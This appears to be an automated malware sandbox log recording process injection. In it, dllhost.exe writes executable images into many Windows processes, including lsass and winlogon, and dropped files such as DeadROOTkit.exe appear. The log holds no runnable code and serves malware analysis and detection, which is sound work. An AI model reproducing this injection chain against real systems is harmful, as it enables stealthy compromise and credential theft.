Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 151C5AA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 270F8FD0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 16BF33D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1A348770000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 2FB0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1F3EAD60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 18686DD0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 24F4DB10000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27E6F950000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2DC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: A50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: ED0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E20000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 15B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2B60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1350000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1310000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1270000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: AA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F20000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 2F40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E70000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1150000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: ED0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C20000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: A40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1380000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 900000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 14C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: D00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9F0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13F0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: D00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 510000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 6E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9E0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: E30000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 13D0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 10B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 870000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B90000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1A0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F10000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1390000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: B00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1470000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 5C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 910000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 5B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EF0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: EE0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: BD0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 3B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 790000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: F50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 8C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 1210000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: BD0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: DA0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: C60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: FC0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\xZBprBbdeOnkbIgDEbppLASfVbhbLQAMejmEurgzlXmYYoBEGDdiYFIuaFom\LfzsCkCtsZlGsmeVs.exe base: 9B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\Public\DeadXClient.exe base: 1B410000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\Public\DeadROOTkit.exe base: 1B9F0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 13B38860000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1F080000000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1EF2F790000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 24D21B40000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2023BB50000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\schtasks.exe base: 1A8EC190000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2CCE00B0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\Public\Deadsvchost.exe base: 560000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\Public\Deadsvchost.exe base: 940000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Users\user\AppData\Local\DeadROOTkit.exe base: 11C0000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E9CEF00000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E9CEF60000 value starts with: 4D5A Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 2580 base: 8BA0000 value: 4D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 6968 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: F1B13F3010 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAF1E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
